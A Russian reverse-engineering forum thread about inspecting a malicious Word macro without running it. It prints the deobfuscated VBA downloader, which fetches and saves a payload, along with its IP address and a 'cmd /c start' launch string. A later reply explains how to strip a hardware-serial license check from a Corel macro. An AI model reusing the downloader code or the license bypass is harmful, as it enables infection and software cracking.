eXeLab
eXeL@B ВИДЕОКУРС !

ВИДЕОКУРС ВЗЛОМ
выпущен 12 ноября!


УЗНАТЬ БОЛЬШЕ >>
Домой | Статьи | RAR-cтатьи | FAQ | Форум | Скачать | Видеокурс
Новичку | Ссылки | Программирование | Интервью | Архив | Связь

Русский / Russian English / Английский

Сейчас на форуме: Aqua_regia, shura_k (+1 невидимый пользователь)
 · Начало · Статистика · Регистрация · Поиск · ПРАВИЛА ФОРУМА · Язык · RSS · SVN ·

 eXeL@B —› Основной форум —› Просмотр макроса / не активируя его
Посл.ответ Сообщение


Ранг: 468.0 (мудрец)
Статус: Участник
[www.AHTeam.org]

Создано: 8 декабря 2015 11:44 · Поправил: 8 декабря 2015 15:01 Модератор New!
Цитата · Личное сообщение · #1

Пришло по почте говницо в виде .mht архива, с измененным расширением .doc Ворд видит там макросы, и судя по всему это давнлоадер какой то. Как открыть и посмотреть макросы в ворде я знаю, вопрос можно ли сделать это же не активируя их?. Пробовал выдрать содержание, результатом которого получился editdata.mso (ActiveMime object (.MSO)) Но чем его открыть, тоже не понятно.

Ранг: 92.3 (постоянный)
Статус: Участник

Создано: 8 декабря 2015 12:46 New!
Цитата · Личное сообщение · #2


Ранг: 140.5 (ветеран)
Статус: Участник

Создано: 8 декабря 2015 12:53 · Поправил: 8 декабря 2015 15:28 -=AkaBOSS=- New!
Цитата · Личное сообщение · #3

KingSise пишет:
получился editdata.mso (ActiveMime object (.MSO)) Но чем его открыть, тоже не понятно.

https://blog.cyren.com/articles/new-tricks-of-macro-malware.html

cmd> OfficeMalScanner vbaProject.bin info

| Сообщение посчитали полезным: KingSise



Ранг: 468.0 (мудрец)
Статус: Участник
[www.AHTeam.org]

Создано: 8 декабря 2015 12:58 · Поправил: 8 декабря 2015 14:10 KingSise New!
Цитата · Личное сообщение · #4

-=AkaBOSS=-, толь я твое сообщение не увидел, толи еще что. Спасибо за инфу, это то что нужно.

Один маленький вопрос, в статье говориться что ActiveMime. пожат zlib´ом.

вопрос снимается, не увидел вот это:

The zlib compressed data on ActiveMime part starts with the magic hex number 0x789C (zlib compressed data) upto the end of file. You can use the following simple python code that I wrote that can decode the discussed zlib compressed data on ActiveMime.


Ранг: 140.5 (ветеран)
Статус: Участник

Создано: 8 декабря 2015 14:18 · Поправил: 8 декабря 2015 14:20 -=AkaBOSS=- New!
Цитата · Личное сообщение · #5

KingSise

зеленым отмечен размер блока, начиная со следующего байта.
начало сжатых данных отмечено жёлтым - zlib видно невооружённым глазом.

я уже ведь вытащил всё и предоставил в предыдущем посте.
сам скрипт после деобфускации выглядит примерно так:

Code:
  1. Attribute VB_Name = "anal"
  2. Sub k97cae4tYVh()
  3. Set QITBT7cRW = CreateObject("Microsoft.XMLHTTP")
  4. QITBT7cRW.Open "poST", nI87i2H2qKvk.IyF1dapumLpR, False
  5. QITBT7cRW.send
  6. Set rQjVsPVgc = CreateObject("ADODB.Stream")
  7. rQjVsPVgc.Open
  8. rQjVsPVgc.Type = 0 + 0 + 0 + 1
  9. rQjVsPVgc.Write QITBT7cRW.responseBody
  10. rQjVsPVgc.SaveToFile ua9CYqa59c.AkpuisfMELx2, 2
  11. rQjVsPVgc.Close
  12. ua9CYqa59c.qeumCNf8YfVrRc
  13. End Sub


пары ключевых переменных не хватает, куда они пропали - хз.
на форме еще висят две строчки, возможно как-то связаны:
"91.223.88.50"
"cmd /c start %TMP%/suka.exe"


Ранг: 468.0 (мудрец)
Статус: Участник
[www.AHTeam.org]

Создано: 8 декабря 2015 14:30 New!
Цитата · Личное сообщение · #6

Мдя, автор с переменными особо не старался ;) Особенно радует karma, anal, suka ☺

Добавлено спустя 1 минуту
-=AkaBOSS=- пишет:
я уже ведь вытащил всё и предоставил в предыдущем посте.


да, я видел, хотел на будущее саму распаковку понять. Что то много последнее время говница такого приходить стало...


Статус: Пришелец

Создано: 8 декабря 2015 15:01 New!
Цитата #7

От модератора: Забанить тебя что ли на недельку за атачи вирусни на форуме?

| Сообщение посчитали полезным: KingSise



Ранг: 468.0 (мудрец)
Статус: Участник
[www.AHTeam.org]

Создано: 8 декабря 2015 15:04 New!
Цитата · Личное сообщение · #8

int пишет:
за атачи вирусни на форуме?


ну в общем было бы справедливо. Как то подзабыл запаролить и на обменник кинуть.


Ранг: 281.6 (наставник)
Статус: Участник

Создано: 8 декабря 2015 22:02 New!
Цитата · Личное сообщение · #9

С 2003го офиса же политика безопасности по дефолту не позволит исполнить макрос в doc, xls

Ранг: 382.5 (мудрец)
Статус: Участник

Создано: 8 декабря 2015 22:05 · Поправил: 8 декабря 2015 22:05 dosprog New!
Цитата · Личное сообщение · #10

DenCoder пишет:
С 2003го офиса же политика безопасности по дефолту не позволит исполнить макрос в doc, xls


А что толку? - Редактирование макросов всё равно запаролено.


Ранг: 105.6 (ветеран)
Статус: Участник

Создано: 10 декабря 2015 14:04 New!
Цитата · Личное сообщение · #11

Может для кого-то окажется открытием. Я без проблем открывал макросы, заблокированные в мелкомягком офисе, через open-office. Макрос был исправлен на бинарном уровне. Open-office всякий мусор в коде макроса выводил, но прочитать и понять макрос не составило труда. Исправить и сохранить правда не получится.

Ранг: 1.1 (гость)
Статус: Участник

Создано: 23 января 2016 18:54 · Поправил: 23 января 2016 18:59 kapka29 New!
Цитата · Личное сообщение · #12

есть макрос для corel, он привязан к железу, думаю что к жёсткому диску. есть какие5 либо варианты сделать этот макрос что бы он ставился на любое железо? программой HENPortable добираюсь до состовляющих этого макроса, изменяю DPB на DPx, вижу коды которые указывают на железо а изменить их или выкинуть ну ваще не получаеться. вот пример того что мне открываеться.
под пункт run program
Public Sub Zapysk()

Dim strComputer As String
Dim objWMIService As Object
Dim k As Double
Dim serial As String
Dim s As String

Dim colDiskDrive As Object, objDiskDrive As Object
strComputer = "."
TB_path = Application.Path

Set myFSO = CreateObject("Scripting.FileSystemObject")
Set Fld = myFSO.GetFolder(TB_path + "GMS\Sborka_T")

Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!" & strComputer & "\root\cimv2")
Set colDiskDrive = objWMIService.execquery("SELECT * FROM Win32_PhysicalMedia ")

For Each objDiskDrive In colDiskDrive
k = k + 1
Debug.Print "Serial Namber HDD:" & objDiskDrive.SerialNumber '????? ? ???? immediate
If k = 1 Then
s = objDiskDrive.SerialNumber
End If
Next

' MsgBox "SerialNumber: " & s & Chr(10)


serial = " здеся я так думаю и прописано железо .номер убрал"

zf = Trim(s)
serial = Trim(serial)

' MsgBox Len(serial) & " " & Len(zf)

Debug.Print "PC_code |" & zf & "| " & "Klient code |" & serial & "| "
Debug.Print InStr(1, zf, serial, vbTextCompare)

If InStr(1, zf, serial, vbTextCompare) = 1 Then
frmFasad.Show
Else

Fld.Delete
Kill TB_path + "GMS\*.gms"

MsgBox "Bye"
Exit Sub

End If

End Sub


Ранг: 140.5 (ветеран)
Статус: Участник

Создано: 23 января 2016 23:50 New!
Цитата · Личное сообщение · #13

s = objDiskDrive.SerialNumber - вот тут считанный серийник винта
;serial по ходу это введённый юзером серийник же

;а вот и проверка
If InStr(1, zf, serial, vbTextCompare) = 1 Then
frmFasad.Show
Else
Fld.Delete
Kill TB_path + "GMS\*.gms"
MsgBox "Bye"
Exit Sub
End If

; вместо неё можно просто оставить
frmFasad.Show
 eXeL@B —› Основной форум —› Просмотр макроса / не активируя его

Оригинальный DVD-ROM: eXeL@B DVD !

Вы находитесь на форуме сайта EXELAB.RU
Проект ReactOS